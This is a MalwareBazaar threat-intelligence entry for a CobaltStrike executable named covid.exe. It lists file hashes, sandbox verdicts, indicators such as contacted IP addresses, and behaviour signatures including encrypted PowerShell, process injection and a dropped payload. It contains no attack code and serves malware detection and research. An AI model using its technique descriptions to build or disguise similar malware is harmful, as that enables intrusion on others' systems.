MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


CobaltStrike


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
SHA3-384 hash: 6cc5e5b300ac3f1ff8e7a153f09e76a464a2d459e27368cecfcfec3fada21374b9a44db6deb8032e33ca93e3ad9d1d5f
SHA1 hash: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a
MD5 hash: a990c03d14bef241e880d6167fa5a6aa
humanhash: hawaii-carolina-table-asparagus
File name:covid.exe
Download: download sample
Signature CobaltStrike
Create hunting rule
File size:5'253'560 bytes
First seen:2021-04-01 05:56:45 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash f34d5f2d4577ed6d9ceec516c1f5a744 (48'657 x AgentTesla, 19'468 x Formbook, 12'206 x SnakeKeylogger)
ssdeep 1536:LLh9KxmwAPQDPjPbFxCxQIxSPTSWPyl1tszJDrj:LLh9Lsrj
Threatray 648 similar samples on MalwareBazaar
TLSH 6F36E057A4F710DAA09792755FDCF8BF86B9E01B1A6E7AB31140E352CF357984A230B0
Reporter ankit_anubhav
Tags:Cobalt Strike

Intelligence

File Origin
# of uploads :
1
# of downloads :
102
Origin country :
n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
https://1drv.ms/u/s!AgPvhwlpBHeFoyfME-AwK86GTgEI?e=RmNNok
Verdict:
Malicious activity
Analysis date:
2021-03-31 02:54:58 UTC
Tags:
covid19
Link:
https://app.any.run/tasks/fdc32e9e-da09-4d63-96c3-641fa8d67035

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/130451/
Result
Verdict:
Clean
Maliciousness:

Behaviour
Launching a process
Creating a process with a hidden window
Creating a window
Sending a UDP request
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Result
Threat name:
Unknown
Detection:
malicious
Classification:
bank.troj.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/661633
Signature
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Bypasses PowerShell execution policy
Early bird code injection technique detected
Encrypted powershell cmdline option found
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 379751 Sample: covid.exe Startdate: 01/04/2021 Architecture: WINDOWS Score: 100 82 Antivirus / Scanner detection for submitted sample 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 Potential dropper URLs found in powershell memory 2->86 88 2 other signatures 2->88 9 covid.exe 2 2->9         started        13 buyonegetone.exe 2->13         started        15 buyonegetone.exe 2->15         started        17 buyonegetone.exe 2->17         started        process3 file4 64 C:\Users\user\AppData\Local\...\covid.exe.log, ASCII 9->64 dropped 102 Malicious encrypted Powershell command line found 9->102 104 Encrypted powershell cmdline option found 9->104 106 Bypasses PowerShell execution policy 9->106 19 powershell.exe 1 36 9->19         started        108 Early bird code injection technique detected 13->108 110 Writes to foreign memory regions 13->110 112 Allocates memory in foreign processes 13->112 23 mobsync.exe 13->23         started        25 conhost.exe 13->25         started        27 mobsync.exe 15->27         started        29 conhost.exe 15->29         started        31 mobsync.exe 17->31         started        34 conhost.exe 17->34         started        signatures5 process6 dnsIp7 60 C:\Users\user\AppData\...\buyonegetone.exe, PE32+ 19->60 dropped 62 PowerShell_transcr....20210401080426.txt, UTF-8 19->62 dropped 90 Uses cmd line tools excessively to alter registry or file data 19->90 92 Powershell drops PE file 19->92 36 buyonegetone.exe 19->36         started        39 iexplore.exe 6 85 19->39         started        42 conhost.exe 19->42         started        48 2 other processes 19->48 44 WerFault.exe 23->44         started        46 WerFault.exe 27->46         started        80 168.62.194.64 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->80 file8 signatures9 process10 dnsIp11 94 Early bird code injection technique detected 36->94 96 Writes to foreign memory regions 36->96 98 Allocates memory in foreign processes 36->98 100 Queues an APC in another process (thread injection) 36->100 50 mobsync.exe 36->50         started        52 conhost.exe 36->52         started        72 www.who.int 39->72 54 iexplore.exe 39->54         started        74 168.61.161.212 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 44->74 76 192.168.2.1 unknown unknown 46->76 signatures12 process13 dnsIp14 57 WerFault.exe 50->57         started        66 fontawesome-cdn.fonticons.netdna-cdn.com 23.111.9.35, 443, 49708, 49709 HIGHWINDS2US United States 54->66 68 108.177.15.154 GOOGLEUS United States 54->68 70 23 other IPs or domains 54->70 process15 dnsIp16 78 13.88.21.125 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 57->78
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0/
Threat name:
Win32.Ransomware.Generic
Create hunting rule
Status:
Suspicious
First seen:
2021-03-31 19:26:40 UTC
AV detection:
10 of 29 (34.48%)
Threat level:
  5/5
Verdict:
malicious
Label(s):
cobaltstrike
Create hunting rule
Similar samples:
03729ae2db20f485c0b83fbf36d2a22d629137deb2032bf972132db9f2805882
CobaltStrike
132bdcb986e3e3b9599b5b293b3318e7c630495e87a9d1fa02287ae80f9e652f
CobaltStrike
1c8de01df040c973b37ae5ce8e1bb523e1ba24a9c25263706022f9a9894a2e50
CobaltStrike
452363ce4a4695a985d5a6200de2b43692f7e0d4df11f0b30b42fc78a0cc9440
CobaltStrike
6cf0a44011ec1e1a891d7d06357c4687634e42d65a3eecfe9180e608b5d6e150
CobaltStrike
84cef0aed269e6213bfa213d95a3db625bcdde130f33bf4227436985e4473252
CobaltStrike
8fabea95cbfe1da521dfcd7880ec3301a3a32175741680d8c1a8acacc0199eb7
CobaltStrike
a93eb70cc4152e32cd3a39fda968b2da5ade48453927410a0d520f2d13223d11
CobaltStrike
d03b1d500e960377df77a72c5074b4c56b29f938f48ecd03ac846b38d3c914d3
CobaltStrike
f25295fc7d3435f80f39e602465da255ee0ace3d845315dac8731873adff894d
CobaltStrike
+ 638 additional samples on MalwareBazaar
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/210401-w63nn4ppls/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Unpacked files
SH256 hash:
9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
MD5 hash:
a990c03d14bef241e880d6167fa5a6aa
SHA1 hash:
210c7bed3182e3113b9a20816ced2f9c2ad6f86a
Link:
https://www.unpac.me/results/2c00b22f-6878-48c8-8b59-a7b239102ef7/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Dropper
Score:
0.80
Link:
https://yomi.yoroi.company/submissions/9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/130451/

Comments